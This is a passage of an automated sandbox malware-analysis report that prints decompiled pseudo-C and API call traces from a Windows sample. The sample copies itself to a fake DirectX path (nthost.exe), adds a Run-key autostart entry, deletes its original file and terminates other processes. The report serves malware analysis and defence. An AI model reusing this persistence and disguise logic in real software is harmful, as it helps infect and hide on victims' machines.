    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t16 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t16);
							_t38 =  *((intOrPtr*)(0x454640));
							_t7 = _t38 + 0x10; // 0x400000
							_t26 =  *_t7;
							_t8 = _t38 + 4; // 0x400000
							if(_t26 !=  *_t8 && _t26 != 0) {
								FreeLibrary(_t26);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t51 = _t51 + 0xc;
					0x419000 = 0x419000;
					goto L6;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L4;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00405824, Relevance: 1.5, APIs: 1, Instructions: 31
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
				char _v1032;
				int _t13;
				void* _t22;

				_t21 = __edx;
				if(__eax != 0) {
					if( *(__eax + 4) >= 0x10000) {
						return E00404080(__edx,  *(__eax + 4));
					}
					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
					return E00403F78(_t21, _t13, _t22);
				}
				return __eax;
			}






    0x0040582c
    0x00405832
    0x0040583b
    0x00000000
    0x0040586c
    0x00405855
    0x00000000
    0x00405860
    0x00405879

    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00404D84, Relevance: 1.5, APIs: 1, Instructions: 26
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
					_t14 = E00404FC0(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
